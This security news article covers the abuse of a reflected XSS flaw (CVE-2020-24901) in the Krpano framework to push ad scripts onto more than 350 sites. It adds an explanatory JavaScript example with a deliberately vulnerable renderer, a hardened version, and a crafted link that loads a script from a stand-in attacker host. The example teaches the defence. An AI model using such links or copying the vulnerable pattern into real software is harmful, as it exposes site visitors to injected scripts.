Flaw allowed threat actors to inject malicious scripts displaying dubious ads on search results.
More than 350 websites have been compromised as part of a campaign that involved the abuse of an old medium-severity reflected cross-site scripting vulnerability in the Krpano framework.
Security researcher Oleg Zaytsev, in a report shared with The Hacker News, said "it was an industrial-scale abuse of trusted domains." Exploiting the reflected XSS flaw, tracked as CVE-2020-24901, allowed threat actors to inject malicious scripts displaying dubious ads on search results.
"A reflected XSS is a fun vulnerability but on its own requires user interaction, and one of the biggest challenges is to make people click your reflected XSS link. So using search engines as a distribution platform for your XSS is a very creative and cool way to do it," said Zaytsev.
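The point Zaytsev makes is that a reflected XSS payload lives in the link itself: the server echoes a request parameter into the page, so whoever follows the attacker's URL gets the script reflected back and executed, and the only remaining problem is distribution (here, search results). The following JavaScript is an added illustration of that shape and is not Krpano's code or anything from the report; the parameter name `title`, the page template, the hostnames and the URLs are all assumptions chosen for the example.

```javascript
// Added example of a reflected XSS reflection point beside its hardened form.
// Not Krpano's code: the "title" parameter, template and URLs are assumptions.

// Pull query parameters out of a URL as a plain object (URL is a Node/browser global).
function parseQuery(url) {
  return Object.fromEntries(new URL(url).searchParams.entries());
}

// Minimal HTML entity encoding for text placed into an element body or attribute.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: the untrusted parameter is interpolated into the response verbatim,
// so markup in the URL becomes markup in the page. This is the reflected XSS.
function renderVulnerable(url) {
  const q = parseQuery(url);
  const title = q.title === undefined ? "Untitled" : q.title;
  return `<h1>${title}</h1>`;
}

// Hardened: same template, but the value is HTML-encoded before interpolation,
// so "<script>" arrives in the page as text, not as an element.
function renderHardened(url) {
  const q = parseQuery(url);
  const title = q.title === undefined ? "Untitled" : q.title;
  return `<h1>${escapeHtml(title)}</h1>`;
}

// Crude check used only to show the difference between the two renderers:
// did a script element appear in output whose template contained none?
function containsInjectedScript(html) {
  return /<script\b/i.test(html);
}

// Constructed attacker link. Nothing on the server is modified; the whole payload
// rides in the URL, which is why getting such links in front of users (for example
// via search engine results) is the attacker's main challenge.
const attackerLink =
  "https://example.com/tour.html?title=" +
  encodeURIComponent('<script src="https://evil.example/ads.js"></script>');

// Renders both variants for the constructed link; useful when run directly.
function demo() {
  return {
    vulnerable: renderVulnerable(attackerLink),
    hardened: renderHardened(attackerLink),
  };
}
```

Running `demo()` shows the vulnerable renderer emitting a live `<script>` element sourced from the attacker's host, while the hardened renderer emits the same characters as inert text. Output encoding at the point of interpolation is the fix; validating that the parameter "looks harmless" is not, because the encoding in the URL can be varied freely by whoever builds the link.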
Written by Dan Raywood, Senior Editor, SC Media UK